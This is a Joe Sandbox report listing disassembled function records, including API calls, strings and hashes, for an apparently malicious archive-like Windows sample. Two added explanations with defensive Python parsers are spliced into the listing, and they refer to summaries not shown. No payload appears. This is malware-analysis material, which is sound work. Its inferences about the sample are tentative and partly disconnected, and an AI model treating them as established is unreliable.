                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0043ADC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: ASKNEXTVOL
                                                              • API String ID: 445417207-3402441367
                                                              • Opcode ID: 52944a8f91c60336dbc9ca0e4227e9cf428ba84ee46211f88ed79f79a775ad99
                                                              • Instruction ID: fd0be80340ca74b438b0302e04bb48fb9f223aac1bb71ecae915bb4667dc700a
                                                              • Opcode Fuzzy Hash: 52944a8f91c60336dbc9ca0e4227e9cf428ba84ee46211f88ed79f79a775ad99
                                                              • Instruction Fuzzy Hash: A511B4322C0210AFD2118F69AC45F6A376AAB4E702F40041AF280DB5B0C7699926972E
                                                              APIs
                                                              • DialogBoxParamW.USER32(GETPASSWORD1,00010484,0043B270,?,?), ref: 0043DE18
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: DialogParam
                                                              • String ID: GETPASSWORD1$rC$xzG
                                                              • API String ID: 665744214-1110923302
                                                              • Opcode ID: bdf0f5e04a6ebdefdc0ca46e5ff85a51e8ce18c6d1284f5d1726aa771f90adcf
                                                              • Instruction ID: 38c38b7957f3e707f4bb706bbfdc9e17d17c6ab0361f1ec7eba45d70336efb9a
                                                              • Opcode Fuzzy Hash: bdf0f5e04a6ebdefdc0ca46e5ff85a51e8ce18c6d1284f5d1726aa771f90adcf
                                                              • Instruction Fuzzy Hash: 8C113B32640154AADB11DE34BC46BAF3798A70A751F14403AFD49AB181DBBCAC84C76D
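The function records above are emitted one per function with the same five headers (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), which makes them awkward to pivot on by hand. The following Python parser is an added example, not part of the Joe Sandbox report or product: it turns such records into structured objects so that call sites can be indexed by API name, the "$"-joined String ID field can be searched (for instance for the SeRestorePrivilege/SeSecurityPrivilege record), and the fuzzy hashes can be pulled out for hunting. The SAMPLE text is a constructed excerpt copied from two of the records on this page; the regular expressions assume only the layout visible here (bullet-prefixed fields, "Part of subcall function" prefixes, and API lines ending in "ref: <address>").

```python
"""Parse Joe Sandbox per-function records (APIs / Similarity blocks).

Added example, not Joe Sandbox code. It assumes only the record layout seen in
the report text: section headers without a bullet, "• Key: value" fields, and
API lines of the form "Name.MODULE(args), ref: ADDRESS".
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")

# Constructed sample: two records copied from the report text above.
SAMPLE = """\
APIs
• __EH_prolog.LIBCMT ref: 00427406
  • Part of subcall function 00423BBA: __EH_prolog.LIBCMT ref: 00423BBF
• GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004274CD
  • Part of subcall function 00427A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00427AAB
  • Part of subcall function 00427A9C: GetLastError.KERNEL32 ref: 00427AF1
  • Part of subcall function 00427A9C: CloseHandle.KERNEL32(?), ref: 00427B00
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
Similarity
• API ID: ErrorH_prologLast$CloseCurrentHandleProcess
• String ID: SeRestorePrivilege$SeSecurityPrivilege
• API String ID: 3813983858-639343689
• Instruction Fuzzy Hash: 1431D771F04268BADF11EFA5AC45BEFBB78AF09308F44401BF404A7292D77C4A848769
APIs
• DialogBoxParamW.USER32(GETPASSWORD1,00010484,0043B270,?,?), ref: 0043DE18
Similarity
• API ID: DialogParam
• String ID: GETPASSWORD1$rC$xzG
• API String ID: 665744214-1110923302
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: Optional[str]
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address when the API is reached via a subcall


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)  # raw "Key: value" bullets

    @property
    def strings(self) -> List[str]:
        # The report joins referenced strings with "$"; a string that itself
        # contains "$" would be split here, a limitation of that field.
        raw = self.meta.get("String ID", "")
        return raw.split("$") if raw else []

    @property
    def instruction_fuzzy_hash(self) -> str:
        return self.meta.get("Instruction Fuzzy Hash", "")

    def direct_apis(self) -> List[ApiCall]:
        return [a for a in self.apis if a.subcall is None]


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if section == "APIs":      # "APIs" opens a new function record
                records.append(FunctionRecord())
            continue
        if not records:
            continue                   # stray text before the first record
        body = line[2:] if line.startswith("• ") else line
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                records[-1].apis.append(ApiCall(m["name"], m["module"], m["args"], m["ref"], m["sub"]))
        else:
            m = FIELD_RE.match(body)
            if m:
                records[-1].meta[m["key"]] = m["value"]
    return records


def index_by_api(records: List[FunctionRecord]) -> Dict[str, List[str]]:
    """API name -> sorted, de-duplicated call-site addresses across all records."""
    index: Dict[str, set] = {}
    for rec in records:
        for call in rec.apis:
            index.setdefault(call.name, set()).add(call.ref)
    return {k: sorted(v) for k, v in index.items()}


def records_mentioning(records: List[FunctionRecord], needle: str) -> List[FunctionRecord]:
    """Records whose referenced strings or API arguments contain `needle`."""
    return [rec for rec in records
            if any(needle in s for s in rec.strings)
            or any(c.args and needle in c.args for c in rec.apis)]
```

Feeding the whole listing through `parse_records` and then `index_by_api` gives a per-API list of call sites to cross-reference with the disassembly, and `records_mentioning(records, "Privilege")` isolates the token-privilege record without scrolling. The "Download File" suffixes on the Associated lines are web-widget residue and are not part of the record format; strip them before parsing if the text was saved from the browser.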
                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 0042D954
                                                              • _strncpy.LIBCMT ref: 0042D99A
                                                                • Part of subcall function 00431DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00461030,00000200,0042D928,00000000,?,00000050,00461030), ref: 00431DC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                              • String ID: $%s$@%s
                                                              • API String ID: 562999700-834177443
                                                              • Opcode ID: be7ec90cb268b0be71c73fbb7008f8c37b042bf22410f34242167bf53ef92d5b
                                                              • Instruction ID: 81e73822ce8f6d41c853494676b7438e01f4ef83e1930afe68e29cbbcb44d38c
                                                              • Opcode Fuzzy Hash: be7ec90cb268b0be71c73fbb7008f8c37b042bf22410f34242167bf53ef92d5b
                                                              • Instruction Fuzzy Hash: 9321D572A00258AEEB21DFA4DC01FDF3BACAF05304F500017F910962A2E239D688CB59
                                                              APIs
                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0042AC5A,00000008,?,00000000,?,0042D22D,?,00000000), ref: 00430E85
                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0042AC5A,00000008,?,00000000,?,0042D22D,?,00000000), ref: 00430E8F
                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0042AC5A,00000008,?,00000000,?,0042D22D,?,00000000), ref: 00430E9F
                                                              Strings
                                                              • Thread pool initialization failed., xrefs: 00430EB7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                              • String ID: Thread pool initialization failed.
                                                              • API String ID: 3340455307-2182114853
                                                              • Opcode ID: 3dcdd1da1489749dcabc561e594ba3e915ae50ede5f2ebdf2e08fe4d318bdc85
                                                              • Instruction ID: 3afbf8d8ac8f07ba118d84fdad102d2c821bfce86068d40455e53b6ed3c2c405
                                                              • Opcode Fuzzy Hash: 3dcdd1da1489749dcabc561e594ba3e915ae50ede5f2ebdf2e08fe4d318bdc85
                                                              • Instruction Fuzzy Hash: 7111BFB17007089FD3205F6A9C859A7FBECEB68745F10482FF1CA82201D67999408B58
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Malloc
                                                              • String ID: (C$2C$A
                                                              • API String ID: 2696272793-3604884662
                                                              • Opcode ID: 3d53c1eef797afe802f5d43b6168756a14e3a1b350c25c8ae05bdbd347e80a70
                                                              • Instruction ID: 59ac17816077b4d11d5e96931373abc9ed3f8e9707b8d7fc296587abf3c55cd6
                                                              • Opcode Fuzzy Hash: 3d53c1eef797afe802f5d43b6168756a14e3a1b350c25c8ae05bdbd347e80a70
                                                              • Instruction Fuzzy Hash: B1011B75901229ABCB14CFA4E844ADEBBF8EF09700B10416AE905E3310D7349A40DFA8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                              • API String ID: 0-56093855
                                                              • Opcode ID: 134fe0a961820b203af1be5fa61186e77a9f43e50d6c218d9daf60a12a13133e
                                                              • Instruction ID: abecda5166ff1ba9a39c8f326874ad11ab5f5eb953c0c9b85a40ea0b09e4c7e5
                                                              • Opcode Fuzzy Hash: 134fe0a961820b203af1be5fa61186e77a9f43e50d6c218d9daf60a12a13133e
                                                              • Instruction Fuzzy Hash: 7D019E76A04245AFEB118F64FC44A5B7BA8E70D354F10553BF80582230EA748C90DBAE
                                                              APIs
                                                                • Part of subcall function 0042E2E8: _swprintf.LIBCMT ref: 0042E30E
                                                                • Part of subcall function 0042E2E8: _strlen.LIBCMT ref: 0042E32F
                                                                • Part of subcall function 0042E2E8: SetDlgItemTextW.USER32(?,0045E274,?), ref: 0042E38F
                                                                • Part of subcall function 0042E2E8: GetWindowRect.USER32(?,?), ref: 0042E3C9
                                                                • Part of subcall function 0042E2E8: GetClientRect.USER32(?,?), ref: 0042E3D5
                                                              • GetDlgItem.USER32(00000000,00003021), ref: 0042135A
                                                              • SetWindowTextW.USER32(00000000,004535F4), ref: 00421370
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                              • String ID: C$0
                                                              • API String ID: 2622349952-107790966
                                                              • Opcode ID: 25006c4e28a671e0c3ed826191da431ac076197f1054f76d0e6fe9ad1d8394e9
                                                              • Instruction ID: bc5fcbfc1dd1f03c6eaadc3580a3fdbb0ac0ef13c800897d29a18b95b56fd759
                                                              • Opcode Fuzzy Hash: 25006c4e28a671e0c3ed826191da431ac076197f1054f76d0e6fe9ad1d8394e9
                                                              • Instruction Fuzzy Hash: A9F0A4312042ACA6EF154F51EC0D7EA3B5BAF20745F49856AFC4550AB1DB7CC990DB18
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: __alldvrm$_strrchr
                                                              • String ID:
                                                              • API String ID: 1036877536-0
                                                              • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                              • Instruction ID: 79a899db6b64cf4eb22c030aa4dd863a85af5b6b0ff83337dd2232a67dc592f8
                                                              • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                              • Instruction Fuzzy Hash: 24A135729002869FFB25CE29C8817AFBBE5EF55310F1841AFE4859B381C63C9D41E759
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00427F69,?,?,?), ref: 0042A3FA
                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00427F69,?), ref: 0042A43E
                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00427F69,?,?,?,?,?,?,?), ref: 0042A4BF
                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00427F69,?,?,?,?,?,?,?,?,?,?), ref: 0042A4C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CloseHandleTime
                                                              • String ID:
                                                              • API String ID: 2287278272-0
                                                              • Opcode ID: 84b997ad9582c42c472958012bc162ae74de5d64530f274c47e388fcc9d4b2c9
                                                              • Instruction ID: efb69677bf1f6820b3fa805f1f07873f39754d3ac0b8c7f9490cc2258ff2ca8d
                                                              • Opcode Fuzzy Hash: 84b997ad9582c42c472958012bc162ae74de5d64530f274c47e388fcc9d4b2c9
                                                              • Instruction Fuzzy Hash: E241DE302483919BE721EE24ED45BAFBBE4AB84704F44091EB9D0D32D1C6A8DA1CDB57
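The record above lists two CreateFileW calls whose second stack slot (dwDesiredAccess) is 40000000, i.e. GENERIC_WRITE, with OPEN_EXISTING (3) as the disposition and FILE_FLAG_BACKUP_SEMANTICS (02000000) in the flags, followed by SetFileTime and CloseHandle at higher addresses in the same function. That is the shape of a routine that rewrites the timestamps of a file it already has on disk, which is why an analyst reading these plugin records pulls it out for a closer look. The following Python is an added example, not code from Joe Sandbox or from the sample's author: it parses records in the text layout shown on this page (the "• Name.MODULE(args), ref: ADDR" API lines, the "Strings" entries with their xrefs, and the Similarity fields) and applies that GENERIC_WRITE-then-SetFileTime heuristic. The two embedded records are constructed from this page's own entries; the heuristic and the GENERIC_WRITE constant are my assumptions about how to read the fields, not a Joe Sandbox signature. Only the first seven stack slots of a CreateFileW line are its parameters; the remaining slots are whatever the plugin found further up the stack.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample input: two records copied from the report above, with the
# bullets and field names the Joe Sandbox IDA Plugin view prints.
TIMESTAMP_RECORD = """\
APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00427F69,?,?,?), ref: 0042A3FA
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00427F69,?), ref: 0042A43E
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00427F69,?,?,?,?,?,?,?), ref: 0042A4BF
• CloseHandle.KERNEL32(?,?,?,00000800,?,00427F69,?,?,?,?,?,?,?,?,?,?), ref: 0042A4C6
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• API String ID: 2287278272-0
• Opcode Fuzzy Hash: 84b997ad9582c42c472958012bc162ae74de5d64530f274c47e388fcc9d4b2c9
"""
THREADPOOL_RECORD = """\
APIs
• InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0042AC5A,00000008,?,00000000,?,0042D22D,?,00000000), ref: 00430E85
• CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0042AC5A,00000008,?,00000000,?,0042D22D,?,00000000), ref: 00430E8F
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0042AC5A,00000008,?,00000000,?,0042D22D,?,00000000), ref: 00430E9F
Strings
• Thread pool initialization failed., xrefs: 00430EB7
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
"""

# "• Name.MODULE(args), ref: ADDR" or "• _crt_func.LIBCMT ref: ADDR"; entries
# inherited from a callee are prefixed "Part of subcall function ADDR:".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
STR_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<xref>[0-9A-F]{8})$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
GENERIC_WRITE = 0x40000000  # dwDesiredAccess bit; second CreateFileW parameter (assumed reading)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]         # stack slots as printed; "?" means not resolved statically
    ref: str                # address of the call site
    caller: Optional[str]   # set when the entry came from a "Part of subcall" line


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, str]] = field(default_factory=list)   # (text, xref)
    fields: dict = field(default_factory=dict)                     # API ID, hashes, ...


def parse_record(text: str) -> FunctionRecord:
    """Split one plugin record into API calls, strings and identity fields."""
    rec, section = FunctionRecord(), None
    for line in filter(None, map(str.strip, text.splitlines())):
        if not line.startswith("•"):
            section = line              # an unbulleted line is a section header
        elif section == "APIs" and (m := API_RE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            rec.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            rec.strings.append((m["text"], m["xref"]))
        elif section not in ("APIs", "Strings") and (m := FIELD_RE.match(line)):
            rec.fields[m["key"]] = m["value"]
    return rec


def _hex_or_none(slot: str) -> Optional[int]:
    try:
        return int(slot, 16)
    except ValueError:                  # "?" or otherwise unresolved
        return None


def writes_then_sets_filetime(rec: FunctionRecord) -> bool:
    """True when the function opens a file with GENERIC_WRITE and then calls
    SetFileTime: the shape of a routine that can backdate what it wrote.
    Call order here is call-site address order (static), not runtime order."""
    opened_for_write = False
    for call in rec.apis:
        if call.caller:                 # attributed from a callee, not this function
            continue
        if call.name == "CreateFileW" and len(call.args) > 1:
            access = _hex_or_none(call.args[1])
            if access is not None and access & GENERIC_WRITE:
                opened_for_write = True
        elif call.name == "SetFileTime" and opened_for_write:
            return True
    return False


def pivot_keys(rec: FunctionRecord) -> dict:
    """Fields worth carrying into a hunt for the same routine in other reports."""
    return {k: rec.fields.get(k, "") for k in ("API ID", "API String ID", "Opcode Fuzzy Hash")}
```

Treat a hit as a triage lead rather than a verdict: an archive extractor restoring the timestamps of files it unpacks produces exactly the same CreateFileW(GENERIC_WRITE, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS) followed by SetFileTime sequence, and the "?" slots mean the file name was not resolved statically. The Opcode Fuzzy Hash and API String ID from pivot_keys are what you would search for across other reports to see whether this routine is shared with the dropped payloads named in the detection summary.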
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004491E0,?,00000000,?,00000001,?,?,00000001,004491E0,?), ref: 0044C9D5
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044CA5E
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00446CBE,?), ref: 0044CA70
                                                              • __freea.LIBCMT ref: 0044CA79
                                                                • Part of subcall function 00448E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0044CA2C,00000000,?,00446CBE,?,00000008,?,004491E0,?,?,?), ref: 00448E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 349491cc818d6449e03f803de7db94318ee46e274d59efa058e72317a6fc677c
                                                              • Instruction ID: 1502723540f7c433fd2d1f278d88104a500a110982639bf5dfd7f795de9c6d82
                                                              • Opcode Fuzzy Hash: 349491cc818d6449e03f803de7db94318ee46e274d59efa058e72317a6fc677c
                                                              • Instruction Fuzzy Hash: 2931D072A0120AABEF25CF75CC81EAF7BA5EB01310F08412AFC04E6251EB39DD50CB94
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0043A666
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0043A675
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043A683
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0043A691
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: a4198f0014e5bac8a0d22ecc01612fa4a61f31e1ea99470088d9fc9212309bd6
                                                              • Instruction ID: f3d8a6d03d35ead4db4f4575bc5d9a995aa9150e6e06fb9924f04469e10dd1a1
